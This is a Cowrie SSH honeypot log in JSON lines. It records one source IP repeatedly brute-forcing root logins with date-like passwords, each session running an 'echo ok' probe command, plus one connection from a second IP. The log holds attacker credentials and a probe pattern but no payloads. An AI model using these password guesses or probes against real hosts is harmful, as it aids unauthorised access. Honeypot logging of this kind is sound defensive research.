{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:28.020357Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.021120Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.047195Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.048564Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46258,"dst_ip":"1.2.3.4","dst_port":22,"session":"dacda6e7f2ed","protocol":"ssh","message":"New connection: 212.227.125.160:46258 (1.2.3.4:22) [session: dacda6e7f2ed]","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.068955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.071481Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.116122Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.login.success","username":"root","password":"310887","message":"login attempt [root/310887] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.308845Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:28.472832Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.473688Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.502128Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.503345Z","src_ip":"212.227.125.160","session":"dacda6e7f2ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46264,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb0a29d441a","protocol":"ssh","message":"New connection: 212.227.125.160:46264 (1.2.3.4:22) [session: cbb0a29d441a]","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.523877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.524721Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.547529Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.login.success","username":"root","password":"310788","message":"login attempt [root/310788] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.645226Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:28.803818Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.804501Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.833810Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.835310Z","src_ip":"212.227.125.160","session":"cbb0a29d441a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46272,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c1e2ece5ba2","protocol":"ssh","message":"New connection: 212.227.125.160:46272 (1.2.3.4:22) [session: 5c1e2ece5ba2]","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.855304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.865896Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.884812Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.login.success","username":"root","password":"31071987","message":"login attempt [root/31071987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:28.982995Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:29.059436Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.060409Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.084460Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.085679Z","src_ip":"212.227.125.160","session":"5c1e2ece5ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34430,"dst_ip":"1.2.3.4","dst_port":22,"session":"76205e0e2d88","protocol":"ssh","message":"New connection: 212.227.125.160:34430 (1.2.3.4:22) [session: 76205e0e2d88]","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.106729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.117401Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.138942Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35394,"dst_ip":"1.2.3.4","dst_port":22,"session":"97bffd7700fe","protocol":"ssh","message":"New connection: 196.251.86.249:35394 (1.2.3.4:22) [session: 97bffd7700fe]","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.271675Z"}
{"eventid":"cowrie.login.success","username":"root","password":"310582","message":"login attempt [root/310582] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.308336Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:29.535368Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.536118Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.621675Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.622814Z","src_ip":"212.227.125.160","session":"76205e0e2d88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34446,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bf5586a4d2f","protocol":"ssh","message":"New connection: 212.227.125.160:34446 (1.2.3.4:22) [session: 5bf5586a4d2f]","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.664962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.705708Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.707108Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.855375Z","src_ip":"196.251.86.249","session":"97bffd7700fe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.855951Z","src_ip":"196.251.86.249","session":"97bffd7700fe"}
{"eventid":"cowrie.login.success","username":"root","password":"310379","message":"login attempt [root/310379] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:29.885747Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:30.045850Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.046586Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.089889Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.091084Z","src_ip":"212.227.125.160","session":"5bf5586a4d2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34454,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb2c5e85db0e","protocol":"ssh","message":"New connection: 212.227.125.160:34454 (1.2.3.4:22) [session: fb2c5e85db0e]","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.129777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.167936Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.169101Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.login.success","username":"root","password":"310187","message":"login attempt [root/310187] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.541697Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:30.794050Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.794937Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.842738Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.843819Z","src_ip":"212.227.125.160","session":"fb2c5e85db0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34468,"dst_ip":"1.2.3.4","dst_port":22,"session":"3edb753f9c39","protocol":"ssh","message":"New connection: 212.227.125.160:34468 (1.2.3.4:22) [session: 3edb753f9c39]","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.919388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.976526Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:30.977186Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.login.success","username":"root","password":"301189","message":"login attempt [root/301189] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.236113Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:31.483760Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.484470Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.535720Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
